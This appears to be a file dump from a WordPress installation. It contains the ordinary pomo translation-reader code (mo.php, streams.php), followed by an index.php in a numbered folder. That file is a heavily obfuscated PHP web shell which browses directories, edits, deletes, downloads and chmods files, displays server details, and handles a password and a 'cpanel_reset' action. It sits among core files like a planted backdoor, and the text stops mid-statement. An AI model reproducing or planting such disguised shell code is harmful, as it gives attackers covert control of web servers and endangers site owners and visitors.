$hash_addr; fwrite( $fh, pack( 'V*', $magic, $revision, $total, $originals_lengths_addr, $translations_lengths_addr, $size_of_hash, $hash_addr ) ); fseek( $fh, $originals_lengths_addr ); // Headers' msgid is an empty string. fwrite( $fh, pack( 'VV', 0, $current_addr ) ); ++$current_addr; $originals_table = "\0"; $reader = new POMO_Reader(); foreach ( $entries as $entry ) { $originals_table .= $this->export_original( $entry ) . "\0"; $length = $reader->strlen( $this->export_original( $entry ) ); fwrite( $fh, pack( 'VV', $length, $current_addr ) ); $current_addr += $length + 1; // Account for the NULL byte after. } $exported_headers = $this->export_headers(); fwrite( $fh, pack( 'VV', $reader->strlen( $exported_headers ), $current_addr ) ); $current_addr += strlen( $exported_headers ) + 1; $translations_table = $exported_headers . "\0"; foreach ( $entries as $entry ) { $translations_table .= $this->export_translations( $entry ) . "\0"; $length = $reader->strlen( $this->export_translations( $entry ) ); fwrite( $fh, pack( 'VV', $length, $current_addr ) ); $current_addr += $length + 1; } fwrite( $fh, $originals_table ); fwrite( $fh, $translations_table ); return true; } /** * @param Translation_Entry $entry * @return string */ public function export_original( $entry ) { // TODO: Warnings for control characters. $exported = $entry->singular; if ( $entry->is_plural ) { $exported .= "\0" . $entry->plural; } if ( $entry->context ) { $exported = $entry->context . "\4" . $exported; } return $exported; } /** * @param Translation_Entry $entry * @return string */ public function export_translations( $entry ) { // TODO: Warnings for control characters. return $entry->is_plural ? implode( "\0", $entry->translations ) : $entry->translations[0]; } /** * @return string */ public function export_headers() { $exported = ''; foreach ( $this->headers as $header => $value ) { $exported .= "$header: $value\n"; } return $exported; } /** * @param int $magic * @return string|false */ public function get_byteorder( $magic ) { // The magic is 0x950412de. // bug in PHP 5.0.2, see https://savannah.nongnu.org/bugs/?func=detailitem&item_id=10565 $magic_little = (int) - 1794895138; $magic_little_64 = (int) 2500072158; // 0xde120495 $magic_big = ( (int) - 569244523 ) & 0xFFFFFFFF; if ( $magic_little === $magic || $magic_little_64 === $magic ) { return 'little'; } elseif ( $magic_big === $magic ) { return 'big'; } else { return false; } } /** * @param POMO_FileReader $reader * @return bool True if the import was successful, otherwise false. */ public function import_from_reader( $reader ) { $endian_string = MO::get_byteorder( $reader->readint32() ); if ( false === $endian_string ) { return false; } $reader->setEndian( $endian_string ); $endian = ( 'big' === $endian_string ) ? 'N' : 'V'; $header = $reader->read( 24 ); if ( $reader->strlen( $header ) !== 24 ) { return false; } // Parse header. $header = unpack( "{$endian}revision/{$endian}total/{$endian}originals_lengths_addr/{$endian}translations_lengths_addr/{$endian}hash_length/{$endian}hash_addr", $header ); if ( ! is_array( $header ) ) { return false; } // Support revision 0 of MO format specs, only. if ( 0 !== $header['revision'] ) { return false; } // Seek to data blocks. $reader->seekto( $header['originals_lengths_addr'] ); // Read originals' indices. $originals_lengths_length = $header['translations_lengths_addr'] - $header['originals_lengths_addr']; if ( $originals_lengths_length !== $header['total'] * 8 ) { return false; } $originals = $reader->read( $originals_lengths_length ); if ( $reader->strlen( $originals ) !== $originals_lengths_length ) { return false; } // Read translations' indices. $translations_lengths_length = $header['hash_addr'] - $header['translations_lengths_addr']; if ( $translations_lengths_length !== $header['total'] * 8 ) { return false; } $translations = $reader->read( $translations_lengths_length ); if ( $reader->strlen( $translations ) !== $translations_lengths_length ) { return false; } // Transform raw data into set of indices. $originals = $reader->str_split( $originals, 8 ); $translations = $reader->str_split( $translations, 8 ); // Skip hash table. $strings_addr = $header['hash_addr'] + $header['hash_length'] * 4; $reader->seekto( $strings_addr ); $strings = $reader->read_all(); $reader->close(); for ( $i = 0; $i < $header['total']; $i++ ) { $o = unpack( "{$endian}length/{$endian}pos", $originals[ $i ] ); $t = unpack( "{$endian}length/{$endian}pos", $translations[ $i ] ); if ( ! $o || ! $t ) { return false; } // Adjust offset due to reading strings to separate space before. $o['pos'] -= $strings_addr; $t['pos'] -= $strings_addr; $original = $reader->substr( $strings, $o['pos'], $o['length'] ); $translation = $reader->substr( $strings, $t['pos'], $t['length'] ); if ( '' === $original ) { $this->set_headers( $this->make_headers( $translation ) ); } else { $entry = &$this->make_entry( $original, $translation ); $this->entries[ $entry->key() ] = &$entry; } } return true; } /** * Build a Translation_Entry from original string and translation strings, * found in a MO file * * @static * @param string $original original string to translate from MO file. Might contain * 0x04 as context separator or 0x00 as singular/plural separator * @param string $translation translation string from MO file. Might contain * 0x00 as a plural translations separator * @return Translation_Entry Entry instance. */ public function &make_entry( $original, $translation ) { $entry = new Translation_Entry(); // Look for context, separated by \4. $parts = explode( "\4", $original ); if ( isset( $parts[1] ) ) { $original = $parts[1]; $entry->context = $parts[0]; } // Look for plural original. $parts = explode( "\0", $original ); $entry->singular = $parts[0]; if ( isset( $parts[1] ) ) { $entry->is_plural = true; $entry->plural = $parts[1]; } // Plural translations are also separated by \0. $entry->translations = explode( "\0", $translation ); return $entry; } /** * @param int $count * @return string */ public function select_plural_form( $count ) { return $this->gettext_select_plural_form( $count ); } /** * @return int */ public function get_plural_forms_count() { return $this->_nplurals; } } endif; streams.php 0000644 00000017376 15105405334 0006751 0 ustar 00 <?php /** * Classes, which help reading streams of data from files. * Based on the classes from Danilo Segan <danilo@kvota.net> * * @version $Id: streams.php 1157 2015-11-20 04:30:11Z dd32 $ * @package pomo * @subpackage streams */ if ( ! class_exists( 'POMO_Reader', false ) ) : #[AllowDynamicProperties] class POMO_Reader { public $endian = 'little'; public $_pos; public $is_overloaded; /** * PHP5 constructor. */ public function __construct() { if ( function_exists( 'mb_substr' ) && ( (int) ini_get( 'mbstring.func_overload' ) & 2 ) // phpcs:ignore PHPCompatibility.IniDirectives.RemovedIniDirectives.mbstring_func_overloadDeprecated ) { $this->is_overloaded = true; } else { $this->is_overloaded = false; } $this->_pos = 0; } /** * PHP4 constructor. * * @deprecated 5.4.0 Use __construct() instead. * * @see POMO_Reader::__construct() */ public function POMO_Reader() { _deprecated_constructor( self::class, '5.4.0', static::class ); self::__construct(); } /** * Sets the endianness of the file. * * @param string $endian Set the endianness of the file. Accepts 'big', or 'little'. */ public function setEndian( $endian ) { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.MethodNameInvalid $this->endian = $endian; } /** * Reads a 32bit Integer from the Stream * * @return mixed The integer, corresponding to the next 32 bits from * the stream of false if there are not enough bytes or on error */ public function readint32() { $bytes = $this->read( 4 ); if ( 4 !== $this->strlen( $bytes ) ) { return false; } $endian_letter = ( 'big' === $this->endian ) ? 'N' : 'V'; $int = unpack( $endian_letter, $bytes ); return reset( $int ); } /** * Reads an array of 32-bit Integers from the Stream * * @param int $count How many elements should be read * @return mixed Array of integers or false if there isn't * enough data or on error */ public function readint32array( $count ) { $bytes = $this->read( 4 * $count ); if ( 4 * $count !== $this->strlen( $bytes ) ) { return false; } $endian_letter = ( 'big' === $this->endian ) ? 'N' : 'V'; return unpack( $endian_letter . $count, $bytes ); } /** * @param string $input_string * @param int $start * @param int $length * @return string */ public function substr( $input_string, $start, $length ) { if ( $this->is_overloaded ) { return mb_substr( $input_string, $start, $length, 'ascii' ); } else { return substr( $input_string, $start, $length ); } } /** * @param string $input_string * @return int */ public function strlen( $input_string ) { if ( $this->is_overloaded ) { return mb_strlen( $input_string, 'ascii' ); } else { return strlen( $input_string ); } } /** * @param string $input_string * @param int $chunk_size * @return array */ public function str_split( $input_string, $chunk_size ) { if ( ! function_exists( 'str_split' ) ) { $length = $this->strlen( $input_string ); $out = array(); for ( $i = 0; $i < $length; $i += $chunk_size ) { $out[] = $this->substr( $input_string, $i, $chunk_size ); } return $out; } else { return str_split( $input_string, $chunk_size ); } } /** * @return int */ public function pos() { return $this->_pos; } /** * @return true */ public function is_resource() { return true; } /** * @return true */ public function close() { return true; } } endif; if ( ! class_exists( 'POMO_FileReader', false ) ) : class POMO_FileReader extends POMO_Reader { /** * File pointer resource. * * @var resource|false */ public $_f; /** * @param string $filename */ public function __construct( $filename ) { parent::__construct(); $this->_f = fopen( $filename, 'rb' ); } /** * PHP4 constructor. * * @deprecated 5.4.0 Use __construct() instead. * * @see POMO_FileReader::__construct() */ public function POMO_FileReader( $filename ) { _deprecated_constructor( self::class, '5.4.0', static::class ); self::__construct( $filename ); } /** * @param int $bytes * @return string|false Returns read string, otherwise false. */ public function read( $bytes ) { return fread( $this->_f, $bytes ); } /** * @param int $pos * @return bool */ public function seekto( $pos ) { if ( -1 === fseek( $this->_f, $pos, SEEK_SET ) ) { return false; } $this->_pos = $pos; return true; } /** * @return bool */ public function is_resource() { return is_resource( $this->_f ); } /** * @return bool */ public function feof() { return feof( $this->_f ); } /** * @return bool */ public function close() { return fclose( $this->_f ); } /** * @return string */ public function read_all() { return stream_get_contents( $this->_f ); } } endif; if ( ! class_exists( 'POMO_StringReader', false ) ) : /** * Provides file-like methods for manipulating a string instead * of a physical file. */ class POMO_StringReader extends POMO_Reader { public $_str = ''; /** * PHP5 constructor. */ public function __construct( $str = '' ) { parent::__construct(); $this->_str = $str; $this->_pos = 0; } /** * PHP4 constructor. * * @deprecated 5.4.0 Use __construct() instead. * * @see POMO_StringReader::__construct() */ public function POMO_StringReader( $str = '' ) { _deprecated_constructor( self::class, '5.4.0', static::class ); self::__construct( $str ); } /** * @param string $bytes * @return string */ public function read( $bytes ) { $data = $this->substr( $this->_str, $this->_pos, $bytes ); $this->_pos += $bytes; if ( $this->strlen( $this->_str ) < $this->_pos ) { $this->_pos = $this->strlen( $this->_str ); } return $data; } /** * @param int $pos * @return int */ public function seekto( $pos ) { $this->_pos = $pos; if ( $this->strlen( $this->_str ) < $this->_pos ) { $this->_pos = $this->strlen( $this->_str ); } return $this->_pos; } /** * @return int */ public function length() { return $this->strlen( $this->_str ); } /** * @return string */ public function read_all() { return $this->substr( $this->_str, $this->_pos, $this->strlen( $this->_str ) ); } } endif; if ( ! class_exists( 'POMO_CachedFileReader', false ) ) : /** * Reads the contents of the file in the beginning. */ class POMO_CachedFileReader extends POMO_StringReader { /** * PHP5 constructor. */ public function __construct( $filename ) { parent::__construct(); $this->_str = file_get_contents( $filename ); if ( false === $this->_str ) { return false; } $this->_pos = 0; } /** * PHP4 constructor. * * @deprecated 5.4.0 Use __construct() instead. * * @see POMO_CachedFileReader::__construct() */ public function POMO_CachedFileReader( $filename ) { _deprecated_constructor( self::class, '5.4.0', static::class ); self::__construct( $filename ); } } endif; if ( ! class_exists( 'POMO_CachedIntFileReader', false ) ) : /** * Reads the contents of the file in the beginning. */ class POMO_CachedIntFileReader extends POMO_CachedFileReader { /** * PHP5 constructor. */ public function __construct( $filename ) { parent::__construct( $filename ); } /** * PHP4 constructor. * * @deprecated 5.4.0 Use __construct() instead. * * @see POMO_CachedIntFileReader::__construct() */ public function POMO_CachedIntFileReader( $filename ) { _deprecated_constructor( self::class, '5.4.0', static::class ); self::__construct( $filename ); } } endif; 984618/index.php 0000644 00000126747 15105534510 0007167 0 ustar 00 <?php goto fmTCA; vdiwP: foreach ($oCVXT as $PEze1) { goto m24AQ; wojfJ: bl1jJ: goto ExUlZ; m24AQ: $orVrN .= $PEze1 . DIRECTORY_SEPARATOR; goto E8cpp; E8cpp: $r05eF[] = "\74\141\40\x68\x72\145\146\x3d\x22\77\144\151\x72\x3d" . urlencode(rtrim($orVrN, DIRECTORY_SEPARATOR)) . "\42\76" . htmlspecialchars($PEze1) . "\x3c\57\x61\x3e"; goto wojfJ; ExUlZ: } goto HXjKD; l2IR5: JYTGY($xBgIZ); goto yd0Go; IvVnv: echo "\74\x2f\x70\x3e\xd\12\40\40\x20\x20\40\40\x20\40\x20\40\40\40\x3c\160\76\123\x65\162\x76\x65\x72\x20\x49\120\72\40"; goto tJkzp; ttfL0: aFms1: goto A92Wa; swT72: echo "\47\x22\x3e\xd\xa\40\x20\40\x20\40\40\40\x20\40\x20\x20\x20\40\x20\40\x20\40\40\40\x20\x3c\151\40\x63\x6c\x61\x73\x73\x3d\42\146\141\x73\x20\x66\141\55\x61\x72\x72\157\167\55\x6c\145\146\164\x20\x69\143\157\x6e\x22\76\74\x2f\151\76\40\x42\x61\x63\x6b\xd\xa\x20\40\40\40\40\x20\x20\40\x20\40\40\x20\40\x20\40\40\x3c\x2f\x62\165\x74\164\157\x6e\x3e\xd\xa\x20\x20\40\40\40\40\40\x20\40\40\40\x20"; goto ttfL0; py0X4: $gU8I1 = $_POST["\x74\141\162\x67\x65\164"] ?? ''; goto qcAZD; vIhYA: $fgaSl = $_POST["\141\143\164\151\x6f\x6e"]; goto py0X4; rvgDz: $orVrN = ''; goto vdiwP; znrLi: if (!isset($_POST["\143\160\141\x6e\145\x6c\137\162\145\x73\x65\x74"])) { goto OVezA; } goto uMvfF; tJkzp: echo htmlspecialchars($G9w9k); goto Yitd3; EsDYh: tGIVK: goto JgB4y; CutW6: if (is_dir($B3_vJ)) { goto SS6G3; } goto lbc4p; hhLAW: session_start(); goto kFaOy; U1_xr: $CJIOq = ''; goto jFd6j; ms2Qb: lM97w: goto xwGD3; xhKtk: echo "\x3c\x2f\160\x3e\xd\12\40\40\40\x20\40\x20\x20\40\x20\40\40\x20\x3c\x70\x3e\x55\163\145\x72\x6e\141\x6d\145\x3a\40"; goto t8CTZ; yd0Go: OVezA: goto oOe_D; W6f1U: echo htmlspecialchars($CJIOq); goto sW2yx; hIULy: $cy4Li = "\x49\156\x76\141\x6c\151\x64\40\160\141\163\x73\x77\x6f\x72\144\x2e"; goto IilL8; t8CTZ: echo htmlspecialchars($yz45q); goto IvVnv; y4ZAE: echo "\42\76\15\12\x20\40\40\40\40\x20\x20\40\40\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\x3c\x62\165\164\x74\x6f\x6e\x20\x74\171\x70\x65\x3d\x22\163\165\x62\155\x69\164\42\40\x6e\141\155\x65\75\42\x61\143\164\151\x6f\x6e\x22\x20\166\x61\154\x75\x65\75\x22\163\141\x76\x65\42\x3e\123\x61\166\x65\74\57\142\165\x74\x74\157\156\x3e\15\xa\40\40\x20\40\x20\x20\40\x20\40\x20\x20\40\40\x20\x20\x20\74\57\146\157\162\x6d\76\15\xa\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\74\57\x64\151\x76\x3e\xd\xa\40\40\x20\40\x20\40\x20\x20"; goto a0GwW; gGETl: Jc4Ce: goto UBw3k; m2gRw: echo "\x3c\x2f\160\76\xd\xa\x20\x20\40\40\x20\x20\x20\40\x20\40\x20\40\74\160\x3e\x46\162\x65\x65\40\104\x69\163\153\x20\123\x70\141\143\145\x3a\x20"; goto tqNqp; b5EHN: function PxHe9($QRsEj, $GR_DR = 2) { goto I8wsp; I8wsp: $J94UX = log($QRsEj, 1024); goto sHxm_; ClaP0: return round(pow(1024, $J94UX - floor($J94UX)), $GR_DR) . "\x20" . $zFmmV[floor($J94UX)]; goto v79c_; sHxm_: $zFmmV = array('', "\x4b\x42", "\115\x42", "\107\x42", "\124\102"); goto ClaP0; v79c_: } goto EoQSK; zCWCQ: echo htmlspecialchars($gU8I1); goto GOog2; xvj1R: echo urlencode($X2TiU); goto swT72; HXjKD: nPkEu: goto FfeM6; wZeM7: $TAlyz = getcwd(); goto uNb0c; LDu2n: $d3Klz = disk_free_space("\57") / (1024 * 1024 * 1024); goto Z3ZLD; tvE8f: foreach ($D7XpV as $tZphq) { goto kSqHD; s2zqf: echo "\x22\x3e\15\xa\40\40\x20\x20\x20\x20\40\x20\40\40\x20\40\x20\x20\40\x20\40\40\x20\40\x20\x20\x20\40\40\40\x20\40\x20\x20\40\x20\x20\40\x20\40\74\142\x75\164\164\x6f\x6e\x20\164\x79\x70\145\x3d\42\163\x75\142\x6d\x69\164\42\40\156\x61\155\x65\75\x22\x61\x63\x74\x69\157\156\42\40\166\x61\x6c\x75\x65\x3d\42\x64\x6f\167\156\x6c\157\141\144\42\76\x3c\x69\40\x63\154\141\163\x73\75\x22\146\141\163\40\146\141\55\x64\x6f\167\156\x6c\157\141\x64\x20\x69\x63\157\156\x22\x3e\74\x2f\x69\x3e\x20\104\157\167\156\x6c\x6f\141\x64\x3c\x2f\x62\x75\x74\164\157\x6e\76\xd\12\x20\40\x20\x20\40\x20\x20\40\40\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\x3c\x2f\x66\157\x72\x6d\x3e\15\xa\x20\40\40\40\x20\40\x20\x20\40\x20\40\x20\40\40\40\x20\x20\x20\40\x20\40\x20\x20\40\40\40\40\40\x20\40\40\40\x3c\146\157\162\155\x20\x6d\x65\164\150\x6f\144\x3d\x22\120\117\x53\x54\42\40\x73\x74\171\154\145\75\42\x64\x69\163\x70\x6c\141\171\x3a\151\156\154\x69\x6e\145\x3b\42\76\xd\12\x20\x20\x20\x20\x20\40\40\x20\40\x20\40\40\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\x20\x20\x20\40\40\74\151\156\x70\x75\164\x20\x74\x79\160\145\75\42\x68\151\x64\x64\x65\156\x22\40\156\x61\155\x65\75\x22\164\x61\162\147\x65\x74\42\x20\x76\141\x6c\x75\x65\75\42"; goto ybPfa; S1d3M: echo "\x20\x20\x20\x20\40\40\40\x20\x20\40\40\40\40\40\40\x20\40\40\x20\x20\x20\40\40\40\40\40\40\x20\74\x2f\164\144\76\xd\12\40\x20\x20\x20\x20\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\x20\40\40\40\40\40\40\40\x20\x20\40\40\74\164\144\x3e"; goto mAzRF; Krt9L: TjS4P: goto S1d3M; i7jvX: echo htmlspecialchars($jbFPj); goto s2zqf; i2KbB: echo "\x3c\x2f\164\x64\76\xd\xa\x20\x20\40\40\x20\x20\x20\40\x20\40\40\x20\40\x20\x20\x20\x20\40\x20\40\x20\40\x20\40\x20\40\x20\x20\74\164\144\x3e"; goto Jz_0i; zSPDs: $QRsEj = $ahe4M ? "\55" : PxhE9(filesize($jbFPj)); goto ngHoh; w8g1T: echo "\x20\x20\x20\40\x20\x20\x20\40\40\40\40\x20\x20\x20\40\x20\40\x20\40\40\40\x20\x20\40"; goto VcZpa; mwLt1: if ($ahe4M) { goto Ksgqt; } goto fATlF; tcFZK: goto TjS4P; goto yMxM7; yMxM7: Ksgqt: goto b_9zl; SOXHr: echo "\x20\40\40\x20\x20\40\x20\x20\x20\x20\x20\x20\40\40\x20\40\40\40\40\40\40\x20\40\40\40\40\40\40\40\40\40\x20"; goto tcFZK; llIGK: echo urlencode($jbFPj); goto fIpTM; htFxz: yZbST: goto PVWDS; ybPfa: echo htmlspecialchars($jbFPj); goto l52mZ; fATlF: echo "\x20\x20\40\x20\40\x20\40\x20\40\40\40\x20\x20\x20\x20\40\40\40\40\x20\40\40\x20\40\40\40\x20\40\x20\40\40\x20\x20\x20\40\x20"; goto ieclk; L2N2x: echo htmlspecialchars($tZphq); goto fdlCq; iJVXO: echo "\x22\76\15\xa\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\40\x20\x20\x20\40\40\40\40\x20\40\x20\x20\40\40\40\74\142\x75\164\x74\157\156\40\x74\x79\x70\x65\x3d\x22\163\165\142\155\x69\x74\42\40\x6e\141\155\x65\75\42\x61\x63\164\x69\x6f\156\x22\40\x76\x61\154\x75\x65\x3d\x22\x64\145\x6c\145\x74\x65\42\76\x3c\x69\x20\x63\154\x61\163\x73\x3d\x22\146\141\x73\40\146\x61\x2d\x74\162\x61\x73\x68\55\141\x6c\x74\x20\151\x63\x6f\156\x22\76\x3c\57\151\x3e\40\x44\x65\154\x65\x74\145\x3c\57\142\165\164\x74\157\156\76\15\xa\40\x20\40\x20\x20\x20\x20\x20\40\40\40\x20\40\x20\40\x20\40\x20\40\40\x20\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\74\57\x66\x6f\x72\155\x3e\15\xa\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\x20\40\40\40\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\x20\x20\x20\40\40\40\74\x66\157\x72\155\x20\155\x65\164\x68\x6f\144\x3d\x22\120\x4f\123\x54\42\x20\x73\164\171\x6c\145\x3d\42\x64\151\x73\x70\154\x61\171\72\151\x6e\x6c\x69\x6e\x65\73\42\76\15\xa\x20\40\40\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\40\x20\40\40\40\x20\x20\40\40\x20\40\x3c\151\x6e\160\x75\x74\x20\164\171\160\145\75\x22\x68\x69\144\x64\x65\156\x22\40\x6e\x61\x6d\145\75\42\x74\x61\x72\147\145\164\x22\40\166\141\x6c\165\145\75\42"; goto vMZQk; ngHoh: $MaWRK = date("\131\x2d\155\55\144\40\x48\x3a\151\x3a\x73", filemtime($jbFPj)); goto l4YI_; pcgrk: echo htmlspecialchars($jbFPj); goto iJVXO; vMZQk: echo htmlspecialchars($jbFPj); goto ExiFN; Jz_0i: echo $MaWRK; goto SjKxV; ExiFN: echo "\x22\76\15\xa\x20\40\40\40\40\40\40\x20\40\x20\40\x20\40\40\x20\x20\x20\x20\40\40\x20\40\x20\x20\x20\x20\x20\40\40\40\x20\40\40\x20\x20\x20\x3c\x62\165\164\164\x6f\156\40\x74\171\160\145\x3d\42\x73\x75\142\x6d\151\x74\x22\x20\156\141\155\x65\x3d\42\141\143\x74\x69\x6f\x6e\x22\x20\x76\141\154\x75\145\x3d\42\x65\x64\x69\164\42\76\74\151\40\x63\x6c\x61\163\x73\75\42\146\x61\163\x20\x66\141\x2d\x65\144\x69\164\x20\151\143\x6f\156\x22\x3e\74\57\x69\x3e\40\x45\x64\151\x74\74\57\x62\x75\x74\x74\x6f\x6e\x3e\xd\12\x20\40\x20\40\x20\40\40\40\40\x20\x20\x20\x20\x20\40\x20\40\40\40\x20\40\40\x20\40\40\x20\x20\40\x20\x20\x20\40\x3c\x2f\x66\x6f\162\x6d\76\xd\12\40\x20\x20\40\x20\40\40\x20\40\x20\x20\40\40\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\40\x20\40\x20\x20\40\x3c\x66\157\162\x6d\40\x6d\x65\x74\150\157\144\x3d\x22\120\x4f\123\124\42\40\163\x74\x79\x6c\x65\x3d\x22\x64\x69\163\160\x6c\x61\x79\72\151\156\154\x69\x6e\x65\73\x22\76\xd\12\x20\40\x20\x20\40\40\40\x20\x20\x20\40\40\40\x20\40\x20\40\40\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\40\x20\x20\40\x20\x20\40\x3c\x69\156\x70\165\x74\x20\x74\171\160\x65\x3d\x22\x68\151\x64\x64\x65\x6e\42\x20\x6e\x61\x6d\145\75\42\x74\141\x72\147\145\164\42\40\x76\141\154\165\145\75\42"; goto i7jvX; mAzRF: echo $QRsEj; goto i2KbB; b_9zl: echo "\40\40\x20\x20\40\x20\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\40\x20\40\40\x20\40\x20\x20\40\74\x61\40\150\162\x65\x66\75\x22\x3f\x64\x69\x72\75"; goto llIGK; fdlCq: echo "\74\x2f\141\76\15\12\x20\40\40\x20\40\40\x20\x20\40\40\x20\40\40\40\40\40\x20\40\x20\40\40\x20\x20\x20\40\x20\40\40\40\40\x20\x20"; goto Krt9L; VcZpa: $jbFPj = $B3_vJ . DIRECTORY_SEPARATOR . $tZphq; goto DLu_A; DLu_A: $ahe4M = is_dir($jbFPj); goto zSPDs; l52mZ: echo "\42\x3e\15\12\x20\x20\40\40\40\40\40\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\40\x20\40\40\40\x20\x20\40\x20\40\74\x69\156\160\165\164\40\x74\x79\x70\145\x3d\x22\164\x65\x78\164\42\40\156\x61\x6d\x65\x3d\42\x70\x65\x72\x6d\151\x73\163\151\157\156\x73\x22\40\x70\154\x61\143\145\x68\157\x6c\144\145\162\75\42\x50\145\x72\x6d\x69\163\x73\x69\x6f\156\x73\40\50\145\x2e\x67\56\x2c\40\60\67\x35\65\x29\x22\x20\163\x74\171\x6c\x65\75\x22\167\151\x64\164\x68\72\40\x38\60\x70\x78\73\x22\76\15\12\x20\40\40\40\x20\x20\40\40\x20\40\40\40\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x3c\x62\x75\x74\164\157\x6e\x20\164\171\160\x65\75\42\163\165\142\155\151\x74\x22\x20\x6e\x61\155\x65\75\42\141\x63\x74\x69\157\x6e\x22\x20\166\141\x6c\x75\x65\75\42\x63\150\155\157\144\x22\76\x3c\151\40\x63\154\141\163\x73\x3d\42\x66\141\163\x20\146\141\55\x6c\157\x63\x6b\40\x69\143\157\156\42\76\x3c\57\x69\76\40\x43\150\155\x6f\x64\x3c\x2f\x62\165\164\x74\157\156\x3e\15\xa\40\40\x20\x20\40\x20\40\x20\x20\40\40\x20\x20\40\40\40\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\x20\x20\x20\40\x3c\57\146\x6f\162\155\76\15\xa\40\x20\40\x20\40\40\x20\x20\x20\40\x20\40\x20\40\x20\40\x20\40\40\x20\40\x20\40\40\40\40\40\x20\74\57\x74\144\x3e\xd\12\40\40\40\40\40\40\40\x20\40\x20\40\x20\x20\x20\x20\40\x20\40\x20\40\40\x20\40\40\74\57\x74\x72\x3e\xd\12\x20\x20\40\40\x20\40\x20\40\x20\x20\40\40\40\40\40\40\40\x20\x20\40"; goto v3w69; SjKxV: echo "\x3c\57\x74\144\76\xd\xa\40\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\40\x20\x20\40\x20\40\x20\40\x20\x20\40\40\40\40\40\40\x3c\x74\x64\x20\x63\154\x61\163\163\x3d\42\146\x69\x6c\145\55\141\x63\164\151\x6f\156\163\42\76\xd\xa\40\40\40\40\40\x20\40\40\40\40\x20\x20\x20\40\x20\40\40\40\x20\40\40\x20\40\40\40\40\x20\40\x20\x20\40\40\74\x66\x6f\x72\155\40\155\x65\x74\150\157\144\75\x22\120\117\123\124\x22\40\163\164\171\x6c\x65\75\x22\144\x69\163\160\x6c\141\171\x3a\151\156\154\x69\156\145\73\42\x3e\15\xa\40\40\x20\40\x20\x20\x20\40\x20\40\x20\x20\40\x20\40\40\40\x20\40\x20\40\x20\40\40\x20\40\40\x20\40\40\40\x20\x20\40\x20\x20\x3c\x69\156\x70\x75\x74\40\164\x79\160\x65\x3d\42\x68\x69\144\x64\x65\x6e\42\x20\x6e\x61\155\145\x3d\x22\x74\x61\x72\x67\145\x74\x22\40\x76\x61\x6c\x75\x65\75\42"; goto pcgrk; EdlQB: if (!($tZphq !== "\56" && $tZphq !== "\56\x2e")) { goto Ef43U; } goto w8g1T; musJl: echo "\x20\x20\40\40\x20\40\40\40\40\40\40\40\x20\40\x20\x20"; goto htFxz; kSqHD: echo "\x20\x20\40\40\40\x20\40\x20\40\40\x20\40\40\x20\40\x20\x20\40\x20\x20"; goto EdlQB; ieclk: echo htmlspecialchars($tZphq); goto SOXHr; v3w69: Ef43U: goto musJl; fIpTM: echo "\42\x3e"; goto L2N2x; l4YI_: echo "\x20\x20\x20\x20\x20\x20\x20\40\x20\40\40\40\40\x20\x20\x20\40\40\40\40\40\40\x20\40\x3c\x74\162\x3e\15\xa\x20\x20\40\x20\x20\40\x20\40\x20\40\x20\40\40\40\x20\x20\40\x20\x20\x20\x20\40\40\40\x20\x20\40\40\74\164\144\76\xd\12\40\x20\x20\40\x20\x20\x20\40\x20\40\40\40\x20\40\x20\x20\40\40\x20\40\40\40\x20\40\x20\x20\40\x20\x20\x20\x20\x20"; goto mwLt1; PVWDS: } goto BHJ1x; lbc4p: $B3_vJ = dirname(__FILE__); goto m3rwC; wfgLv: TgZkZ: goto SRo6C; XNeMh: if (!(isset($_POST["\x61\x63\164\x69\157\x6e"]) && $_POST["\141\143\164\151\x6f\x6e"] === "\x65\144\151\164")) { goto uWtLE; } goto tO5Md; fmTCA: ini_set("\x64\x69\x73\x70\154\141\171\x5f\145\162\162\x6f\162\x73", 0); goto dOCGA; gHSaa: exit; goto qIPs_; JS3Q6: $perDG = realpath($perDG) ?: "\56"; goto dItts; GOog2: echo "\74\57\x68\62\76\xd\12\x20\x20\x20\40\x20\40\x20\x20\x20\x20\40\x20\x20\40\40\40\74\146\157\162\x6d\40\155\x65\x74\150\157\x64\75\x22\x50\117\123\x54\42\76\15\xa\x20\x20\40\40\40\x20\40\40\x20\x20\40\x20\40\40\x20\x20\x20\x20\40\x20\x3c\x74\145\170\164\141\162\x65\141\40\x6e\141\155\x65\x3d\42\x63\x6f\x6e\x74\145\156\x74\42\76"; goto W6f1U; tO5Md: echo "\40\40\40\x20\40\x20\40\x20\40\40\x20\40\74\144\x69\166\40\143\154\141\x73\163\75\42\145\144\151\x74\x2d\x66\x6f\162\155\x22\76\xd\12\x20\x20\40\x20\40\40\x20\40\40\40\x20\40\40\40\40\40\74\x68\62\76\x45\144\x69\x74\x20\x46\151\154\x65\x3a\40"; goto zCWCQ; JgB4y: $B3_vJ = isset($_GET["\144\151\162"]) ? $_GET["\x64\151\162"] : dirname(__FILE__); goto CutW6; yYpUZ: echo htmlspecialchars($EzBMv); goto i48D3; kmb7e: if (!($_SERVER["\122\x45\x51\x55\x45\x53\x54\x5f\x4d\105\x54\x48\x4f\104"] === "\120\117\x53\x54")) { goto TgZkZ; } goto o7WCF; Thn3c: echo 